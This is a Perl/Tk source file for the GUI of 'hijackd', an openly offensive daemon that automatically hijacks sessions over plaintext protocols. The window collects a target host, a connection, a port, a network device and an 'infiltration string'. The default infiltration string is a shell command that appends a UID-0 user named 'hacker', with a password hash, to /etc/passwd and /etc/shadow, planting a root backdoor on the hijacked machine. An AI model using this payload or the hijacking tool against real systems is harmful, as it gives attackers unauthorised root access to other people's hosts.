#!/usr/bin/perl
#
# GUI code 4 hijackd
#
# Programmed by Bastian Ballmann [ bytebeater@crazydj.de ]
#
# Last Update: 21.12.2002
#
# This code is licensed under the GPL

###[ Loading modules ]###

use Tk;


###[ MAIN PART ]###

# Hauptfenster
$top = MainWindow->new();
$top->title('Hijackd -- Automatic hijacking daemon for plain protocols');
$top->configure(background => 'black', foreground => 'green', borderwidth => 2);

# Frames
$inhalt = $top->Frame->pack(side => 'top', pady => 10, padx => 10);
$inhalt->configure(background => 'black', foreground => 'green');

$configure = $top->Frame->pack(side => 'top', pady => 5, padx => 10);
$configure->configure(background => 'black', foreground => 'green', borderwidth => 2);

$left = $configure->Frame->pack(side => 'left', padx => 10);
$left->configure(background => 'black', foreground => 'green');

$right = $configure->Frame->pack(side => 'right', padx => 10);
$right->configure(background => 'black', foreground => 'green');

$toolbar = $top->Frame->pack(side => 'bottom', pady => 5, padx => 10);
$toolbar->configure(background => 'black', foreground => 'green', borderwidth => 2);

$ausgabe = $top->Frame->pack(side => 'bottom', pady => 15, padx => 10);
$ausgabe->configure(background => 'black', foreground => 'green');


# Labels
$inhalt->Label(text => '[ Hijackd -- Automatic hijacking daemon for plain protocols ]',
		background => 'black',
		foreground => 'green',
		border => 0)->pack(pady => 5);

$inhalt->Label(text => '[ Programmed by Bastian Ballmann ]',
		background => 'black',
		foreground => 'green',
		border => 0)->pack(pady => 5);



# Configuration
$left->Label(text => 'Host:',
	     background => 'black',
	     foreground => 'green',
	     border => 0)->pack(pady => 10, padx => 5);
$target = $right->Entry(background => 'black',
				foreground => 'green')->pack(pady => 6);

$left->Label(text => 'Connection:',
	     background => 'black',
	     foreground => 'green',
	     border => 0)->pack(pady => 10, padx => 5);
$connection = $right->Entry(background => 'black',
				foreground => 'green')->pack(pady => 6);

$left->Label(text => 'Port:',
	     background => 'black',
	     foreground => 'green',
	     border => 0)->pack(pady => 10, padx => 5);
$port = $right->Entry(background => 'black',
				foreground => 'green')->pack(pady => 6);

$left->Label(text => 'Device:',
	     background => 'black',
	     foreground => 'green',
	     border => 0)->pack(pady => 10, padx => 5);
$device = $right->Entry(background => 'black',
			foreground => 'green')->pack(pady => 6);

$device->insert(0,'eth0');

$left->Label(text => 'Infiltration String:',
	     background => 'black',
	     foreground => 'green',
	     border => 0)->pack(pady => 10, padx => 5);
$infiltration_string = $right->Entry(background => 'black',
				     foreground => 'green')->pack(pady => 6);

$infiltration_string->insert(0,"echo 'hacker:x:0:0::/:/bin/sh' >> /etc/passwd && echo 'hacker:\$1\$u70t2mzi\$v8VeFsr3uFwbl772vjb/a0:12019:0:99999:7:::' >> /etc/shadow\n");

# Toolbar
$toolbar->Button(text => 'Start hijackd',
			background => 'black',
			foreground => 'green',
			activebackground => 'black',
			activeforeground => 'red',
			borderwidth => 0,
			border => 0,
			command => \&getcfg)->pack(side => 'left', padx => 10);

$toolbar->Button(text => 'Stop hijackd',
			background => 'black',
			foreground => 'green',
			activebackground => 'black',
			activeforeground => 'red',
			borderwidth => 0,
			border => 0,
			command => sub { exit(0); })->pack(side => 'right', padx => 10);

# Ausgabe
$ausgabe->Label(text => 'Output',
		background => 'black',
		foreground => 'green',
		border => 0)->pack(side => 'top', pady => 10);

$result = $ausgabe->Scrolled(Text,
			     background => 'black',
			     foreground => 'green',
			     border => 2,
			     width => 57,
			     height => 10)->pack(-side => 'bottom', pady => 5);
$result->configure(scrollbars => 'e');

MainLoop();



###[ Subroutines ]###

# Read the configuration
sub getcfg
{
    $tmp = $target->get;

    if(length($tmp) > 0)
    {
	if(config::check_address($tmp) == 1)
	{
	    show_error("Bad address $tmp");
	    return;
	}
	else
	{
	    $args{'h'} = $tmp;
	}
    }

    $tmp = $connection->get;

    if(length($tmp) > 0)
    {
	if(config::check_address($tmp) == 1)
	{
	    show_error("Bad address $tmp");
	    return;
	}
	else
	{
	    $args{'c'} = $tmp;
	}
    }

    $tmp = $device->get;
    $args{'i'} = $tmp;
    $tmp = $port->get;

    if(length($tmp) > 0)
    {
	$args{'p'} = $tmp;
    }

    $tmp = $infiltration_string->get;

    if(length($tmp) > 0)
    {
	$args{'S'} = $tmp;
    }

    start(%args);
}



# Show Error Message
sub show_error
{
    my $msg =  shift;
    my $error = $top->Toplevel;
    $error->title('Error');
    $error->configure(background => 'black');

    $error->Label(text => $msg,
		  background => 'black',
		  foreground => 'green',
		  border => '0')->pack(padx => 10, pady => 10, side => 'top');

    $error->Button(text => 'OK',
		   background => 'black',
		   foreground => 'green',
		   activebackground => 'black',
		   activeforeground => 'red',
		   border => 0,
		   command => sub { $error->destroy })->pack(pady => 5, side => 'bottom');
}

1;
